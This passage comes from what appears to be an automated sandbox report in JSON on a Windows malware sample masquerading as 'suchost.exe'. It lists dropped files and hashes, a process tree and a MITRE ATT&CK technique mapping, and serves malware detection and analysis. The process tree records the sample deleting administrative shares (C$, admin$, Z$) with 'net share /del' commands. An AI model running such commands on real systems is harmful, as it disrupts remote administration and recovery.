"runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DW20.EXE", "file_path": "C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE", "file_size": 1026985, "sha256": "970e96284832bcc534b63b3959275578c70682db9b3c8a0dc0ccf50799a19d22", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "7zFM.exe", "file_size": 683553, "sha256": "581522185507966ae056ac54274b3372dc0c62c2c79678100fa2d7f894e67412", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "7zG.exe", "file_size": 522272, "sha256": "bb64d5a27c318b46707160a5a62d213d912c913c26dd6a88e1d49049923bbadb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Uninstall.exe", "file_size": 202789, "sha256": "a3ad5b22c225a940fdb17a2aee16e6c2fef92bb1d8c350c6e742fc4d697e61b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "suchost.exe.bin", "file_size": 188423, "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00003536", "name": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe", "normalized_path": "C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe", "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3"}, {"uid": "00000000-00003172", "parentuid": "00000000-00003536", "name": "suchost.exe", "normalized_path": "%WINDIR%\\system32\\drivers\\suchost.exe", "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3"}, {"uid": "00000000-00002084", "name": "suchost.exe", "normalized_path": "%WINDIR%\\system32\\drivers\\suchost.exe", "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3"}, {"uid": "00000000-00003484", "parentuid": "00000000-00002084", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c net share Z$ /del /y", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00000768", "parentuid": "00000000-00003484", "name": "net.exe", "normalized_path": "%WINDIR%\\system32\\net.exe", "command_line": "net share Z$ /del /y", "sha256": "d468e6b1b79555ac8bce0300942fd479689eb8f159f3a399848d3bf9b9990a56"}, {"uid": "00000000-00001284", "parentuid": "00000000-00000768", "name": "net1.exe", "normalized_path": "%WINDIR%\\system32\\net1.exe", "command_line": "%WINDIR%\\system32\\net1 share Z$ /del /y", "sha256": "a0be13ac9443acc6d2eea474cc82a727bdb7e1009f573dba34d269f9a6aaa347"}, {"uid": "00000000-00003548", "parentuid": "00000000-00002084", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c net share C$ /del /y", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003456", "parentuid": "00000000-00003548", "name": "net.exe", "normalized_path": "%WINDIR%\\system32\\net.exe", "command_line": "net share C$ /del /y", "sha256": "d468e6b1b79555ac8bce0300942fd479689eb8f159f3a399848d3bf9b9990a56"}, {"uid": "00000000-00000516", "parentuid": "00000000-00003456", "name": "net1.exe", "normalized_path": "%WINDIR%\\system32\\net1.exe", "command_line": "%WINDIR%\\system32\\net1 share C$ /del /y", "sha256": "a0be13ac9443acc6d2eea474cc82a727bdb7e1009f573dba34d269f9a6aaa347"}, {"uid": "00000000-00005192", "parentuid": "00000000-00002084", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c net share admin$ /del /y", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002188", "parentuid": "00000000-00005192", "name": "net.exe", "normalized_path": "%WINDIR%\\system32\\net.exe", "command_line": "net share admin$ /del /y", "sha256": "d468e6b1b79555ac8bce0300942fd479689eb8f159f3a399848d3bf9b9990a56"}, {"uid": "00000000-00001956", "parentuid": "00000000-00002188", "name": "net1.exe", "normalized_path": "%WINDIR%\\system32\\net1.exe", "command_line": "%WINDIR%\\system32\\net1 share admin$ /del /y", "sha256": "a0be13ac9443acc6d2eea474cc82a727bdb7e1009f573dba34d269f9a6aaa347"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 3}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Local Account", "attck_id": "T1087.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", 